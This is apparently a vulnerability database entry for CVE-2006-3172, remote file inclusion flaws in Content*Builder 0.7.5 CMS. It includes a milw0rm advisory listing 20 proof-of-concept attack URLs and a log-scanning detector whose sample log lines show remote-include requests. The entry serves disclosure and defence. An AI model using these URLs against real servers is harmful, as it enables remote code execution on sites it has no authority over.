CVE-2006-3172
CVSS 7.5
Published: 2006-06-22 20:02:00
Last revised: 2016-12-06 21:59:13

[Original] Multiple PHP remote file inclusion vulnerabilities in Content*Builder 0.7.5 allow remote attackers to execute arbitrary PHP code via a URL with a trailing slash (/) character in the (1) lang_path parameter to (a) cms/plugins/col_man/column.inc.php, (b) cms/plugins/poll/poll.inc.php, (c) cms/plugins/user_managment/usrPortrait.inc.php, (d) cms/plugins/user_managment/user.inc.php, (e) cms/plugins/media_manager/media.inc.php, (f) cms/plugins/events/permanent.eventMonth.inc.php, (g) cms/plugins/events/events.inc.php, and (h) cms/plugins/newsletter2/newsletter.inc.php; (2) path[cb] parameter to (i) modules/guestbook/guestbook.inc.php, (j) modules/shoutbox/shoutBox.php, and (k) modules/sitemap/sitemap.inc.php; and the (3) rel parameter to (l) modules/download/overview.inc.php, (m) modules/download/detailView.inc.php, (n) modules/article/fullarticle.inc.php, (o) modules/article/comments.inc.php, (p) modules/article2/overview.inc.php, (q) modules/article2/fullarticle.inc.php, (r) modules/article2/comments.inc.php, (s) modules/headline/headlineBox.php, and (t) modules/headline/showHeadline.inc.php.


[CNNVD] Content-Builder Multiple Remote File Inclusion Vulnerabilities (CNNVD-200606-405)

        Content*Builder 0.7.5 contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code via a URL with a trailing slash (/) character in (1) the lang_path parameter to (a) cms/plugins/col_man/column.inc.php, (b) cms/plugins/poll/poll.inc.php, (c) cms/plugins/user_managment/usrPortrait.inc.php, (d) cms/plugins/user_managment/user.inc.php, (e) cms/plugins/media_manager/media.inc.php, (f) cms/plugins/events/permanent.eventMonth.inc.php, (g) cms/plugins/events/events.inc.php, and (h) cms/plugins/newsletter2/newsletter.inc.php; (2) the path[cb] parameter to (i) modules/guestbook/guestbook.inc.php, (j) modules/shoutbox/shoutBox.php, and (k) modules/sitemap/sitemap.inc.php; and (3) the rel parameter to (l) modules/download/overview.inc.php, (m) modules/download/detailView.inc.php, (n) modules/article/fullarticle.inc.php, (o) modules/article/comments.inc.php, (p) modules/article2/overview.inc.php, (q) modules/article2/fullarticle.inc.php, (r) modules/article2/comments.inc.php, (s) modules/headline/headlineBox.php, and (t) modules/headline/showHeadline.inc.php.

- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CWE (Weakness Category)

CWE-94 [Improper Control of Generation of Code ('Code Injection')]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not currently available

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3172
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3172
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-405
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=115016951316696&w=2
(UNKNOWN)  BUGTRAQ  20060611 Content-Builder (CMS) 0.7.5, Remote command execution
http://www.securityfocus.com/bid/18404
(UNKNOWN)  BID  18404
http://www.vupen.com/english/advisories/2006/2300
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2300
http://xforce.iss.net/xforce/xfdb/27044
(UNKNOWN)  XF  contentbuilder-multiple-file-include(27044)

- Vulnerability information

Content-Builder Multiple Remote File Inclusion Vulnerabilities
High risk  Input validation
2006-06-22 00:00:00 2006-06-27 00:00:00
Remote

- Advisories and patches

        No data available

- Vulnerability information (1903)

Content-Builder (CMS) 0.7.5 Multiple Include Vulnerabilities (EDBID:1903)
php webapps
2006-06-11 Verified
0 Federico Fazzi
N/A
-----------------------------------------------------
Advisory id: FSA:012

Author:    Federico Fazzi
Date:      11/06/2006, 22:30
Synthesis: Content-Builder (CMS) 0.7.5, Remote command execution
Type:      high
Product:   http://www.content-builder.de/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Vulnerable pages:

Multiple vulnerabilities, see poc.

2) Proof of concept:

http://example/[cb_path]/cms/plugins/col_man/column.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/poll/poll.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/user_managment/usrPortrait.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/user_managment/user.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/media_manager/media.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/events/permanent.eventMonth.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/events/events.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/newsletter2/newsletter.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/modules/guestbook/guestbook.inc.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/shoutbox/shoutBox.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/download/overview.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/download/detailView.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/sitemap/sitemap.inc.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/article/fullarticle.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article/comments.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/overview.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/fullarticle.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/comments.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/headline/headlineBox.php?rel=[cmd_url]/
http://example/[cb_path]/modules/headline/showHeadline.inc.php?rel=[cmd_url]/

(note: add a cmd url with final slash (/))

3) Solution:

Sanitize all variables in all files.

# milw0rm.com [2006-06-11]
		

- Vulnerability information

26344
Content*Builder col_man/column.inc.php lang_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Content*Builder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /cms/plugins/col_man/column.inc.php script not properly sanitizing user input supplied to the 'lang_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- Timeline

2006-06-11 Unknown
2006-06-11 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
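
With no patch listed, one way to find inclusion attempts against the affected scripts in web server access logs (an added example, not part of the original record or advisory). It assumes Apache combined log format; the function name `remote_include_attempts` and the sample lines, which use documentation-range addresses, are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter -> affected scripts, both taken from the CVE description above.
AFFECTED = {
    "lang_path": """cms/plugins/col_man/column.inc.php cms/plugins/poll/poll.inc.php
        cms/plugins/user_managment/usrPortrait.inc.php cms/plugins/user_managment/user.inc.php
        cms/plugins/media_manager/media.inc.php cms/plugins/events/permanent.eventMonth.inc.php
        cms/plugins/events/events.inc.php cms/plugins/newsletter2/newsletter.inc.php""".split(),
    "path[cb]": """modules/guestbook/guestbook.inc.php modules/shoutbox/shoutBox.php
        modules/sitemap/sitemap.inc.php""".split(),
    "rel": """modules/download/overview.inc.php modules/download/detailView.inc.php
        modules/article/fullarticle.inc.php modules/article/comments.inc.php
        modules/article2/overview.inc.php modules/article2/fullarticle.inc.php
        modules/article2/comments.inc.php modules/headline/headlineBox.php
        modules/headline/showHeadline.inc.php""".split(),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that points off-host: scheme://... or protocol-relative //host
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def remote_include_attempts(log_lines):
    """Return (line_no, script, parameter, value) for each suspicious request."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qsl percent-decodes names and values, so path%5Bcb%5D is caught too.
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            for script in AFFECTED.get(param, ()):
                if url.path.endswith("/" + script) and REMOTE.match(value):
                    hits.append((no, script, param, value))
    return hits

# Constructed sample lines (not real traffic).
SAMPLE = [
    '192.0.2.10 - - [11/Jun/2006:22:31:02 +0200] "GET /cb/cms/plugins/poll/poll.inc.php?lang_path=http://198.51.100.7/x/ HTTP/1.0" 200 512 "-" "-"',
    '192.0.2.10 - - [11/Jun/2006:22:31:05 +0200] "GET /cb/modules/guestbook/guestbook.inc.php?path%5Bcb%5D=http%3A%2F%2F198.51.100.7%2Fx%2F HTTP/1.0" 200 498 "-" "-"',
    '192.0.2.44 - - [11/Jun/2006:22:40:17 +0200] "GET /cb/index.php?rel=http://example.org/ HTTP/1.1" 200 2301 "-" "-"',
    '192.0.2.44 - - [11/Jun/2006:22:41:00 +0200] "GET /cb/modules/article/fullarticle.inc.php?rel=../ HTTP/1.1" 200 1022 "-" "-"',
]

if __name__ == "__main__":
    for hit in remote_include_attempts(SAMPLE):
        print(hit)
```

Parameters sent in a POST body are not written to access logs, so this covers query-string requests only.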

- Related references

- Vulnerability author

 

 
